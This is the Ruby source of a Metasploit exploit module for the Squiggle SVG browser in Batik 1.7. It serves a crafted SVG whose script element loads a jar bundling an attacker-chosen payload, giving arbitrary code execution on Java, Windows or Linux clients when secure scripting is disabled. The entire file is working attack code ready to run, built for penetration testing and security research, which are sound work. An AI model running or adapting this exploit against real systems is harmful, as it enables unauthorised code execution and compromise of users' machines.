metasploit-gs/modules/exploits/multi/misc/batik_svg_java.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Squiggle 1.7 SVG Browser Java Code Execution",
        'Description' => %q{
          This module abuses the SVG support to execute Java Code in the
          Squiggle Browser included in the Batik framework 1.7 through a
          crafted SVG file referencing a jar file.

          In order to gain arbitrary code execution, the browser must meet
          the following conditions: (1) It must support at least SVG version
          1.1 or newer, (2) It must support Java code and (3) The "Enforce
          secure scripting" check must be disabled.

          The module has been tested against Windows and Linux platforms.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Nicolas Gregoire', # aka @Agarri_FR, Abuse discovery and PoC
          'sinn3r',           # Metasploit module
          'juan vazquez'      # Metasploit module
        ],
        'References' => [
          ['OSVDB', '81965'],
          ['URL', 'http://www.agarri.fr/blog/']
        ],
        'Payload' => {
          'Space' => 20480,
          'BadChars' => '',
          'DisableNops' => true
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => %w{java linux win},
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
            }
          ],
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-05-11',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    jar_uri = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource
    jar_uri << "/#{rand_text_alpha(rand(6) + 3)}.jar"
    rand_text = Rex::Text.rand_text_alphanumeric(rand(8) + 4)

    if request.uri =~ /\.jar$/
      paths = [
        [ "Exploit.class" ],
        [ "Exploit$1.class"],
        [ "META-INF", "MANIFEST.MF"]
      ]

      p = regenerate_payload(cli)

      jar = p.encoded_jar
      paths.each do |path|
        1.upto(path.length - 1) do |idx|
          full = path[0, idx].join("/") + "/"
          if !(jar.entries.map { |e| e.name }.include?(full))
            jar.add_file(full, '')
          end
        end

        fd = File.open(File.join(Msf::Config.data_directory, "exploits", "batik_svg", path), "rb")
        data = fd.read(fd.stat.size)
        jar.add_file(path.join("/"), data)
        fd.close
      end

      print_status("#{cli.peerhost} - Sending jar payload")
      send_response(cli, jar.pack, { 'Content-Type' => 'application/java-archive' })

    elsif agent =~ /Batik/
      svg = %Q|
      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">
      <script type="application/java-archive" xlink:href="#{jar_uri}"/>
      <text>#{rand_text}</text>
      </svg>
      |

      svg = svg.gsub(/\t\t\t/, '')
      print_status("#{cli.peerhost} - Sending SVG")
      send_response(cli, svg, { 'Content-Type' => 'image/svg+xml' })

    else
      print_error("#{cli.peerhost} - Unknown client request: #{request.uri.inspect}")
    end
  end
end